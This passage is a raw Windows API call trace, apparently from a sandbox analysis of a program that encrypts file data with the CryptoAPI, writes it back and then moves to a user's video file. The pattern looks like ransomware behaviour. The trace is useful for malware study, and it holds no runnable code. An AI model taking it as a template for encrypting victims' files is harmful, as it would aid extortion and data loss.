Size=0x10) returned 0x43cb078 [0106.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0106.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0106.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0106.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0106.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0106.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0378 [0106.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0106.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0106.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0106.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0106.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0106.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0106.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0106.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0106.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0106.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0106.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0378 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0106.515] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0106.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0106.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0106.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0106.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0106.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0106.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0106.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0106.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0106.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0106.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0106.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0106.516] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0106.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03a0 | out: hHeap=0x1780000) returned 1 [0106.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0106.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0106.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0106.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0106.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0106.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0106.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d05a8 | out: hHeap=0x1780000) returned 1 [0106.517] CryptGetKeyParam (in: hKey=0x41ac180, dwParam=0x7, pbData=0x43e2c40, pdwDataLen=0x144d900, dwFlags=0x0 | out: pbData=0x43e2c40*=0x6610, pdwDataLen=0x144d900*=0x4) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0580 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0106.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0106.518] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0106.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0106.519] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0106.519] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03f0 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41acc40 | out: hHeap=0x1780000) returned 1 [0106.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0106.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0106.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0106.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0106.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0106.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0106.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0106.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0106.520] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0106.520] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0106.520] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0106.520] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.520] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0106.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb048, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0106.521] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144de30*=0x7644, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144de30*=0x7650) returned 1 [0106.521] CharLowerBuffW (in: lpsz="byte[30289]", cchLength=0xb | out: lpsz="byte[30289]") returned 0xb [0106.521] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0106.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb180, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0106.521] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x452c300*, pdwDataLen=0x144de30*=0x7644, dwBufLen=0x7650 | out: pbData=0x452c300*, pdwDataLen=0x144de30*=0x7650) returned 1 [0106.521] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0106.521] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0106.522] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0106.522] WriteFile (in: hFile=0x258, lpBuffer=0x451d668*, nNumberOfBytesToWrite=0x7650, lpNumberOfBytesWritten=0x144e834, lpOverlapped=0x0 | out: lpBuffer=0x451d668*, lpNumberOfBytesWritten=0x144e834*=0x7650, lpOverlapped=0x0) returned 1 [0106.524] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0106.524] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.524] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0106.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cad18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0106.524] CryptDestroyKey (hKey=0x41ac180) returned 1 [0106.524] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0106.524] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0106.524] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0106.524] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0106.524] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0106.524] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0106.524] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.525] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0106.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0106.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0106.525] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0106.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.525] FreeLibrary (hLibModule=0x756e0000) returned 1 [0106.525] CloseHandle (hObject=0x298) returned 1 [0106.525] CloseHandle (hObject=0x258) returned 1 [0106.527] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\kdyPGegxQAqdUuFtfW.mkv", nBufferLength=0x7fff, lpBuffer=0x143e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\kdyPGegxQAqdUuFtfW.mkv", lpFilePart=0x0) returned 0x63 [0106.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d3920 [0106.527] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\kdyPGegxQAqdUuFtfW.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\kdypgegxqaqduuftfw.mkv")) returned 0x20 [0106.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0106.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0106.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0106.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0106.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0106.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0106.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0106.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0106.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0106.527] RtlAllocateHeap (HeapHandle=0x1780000, 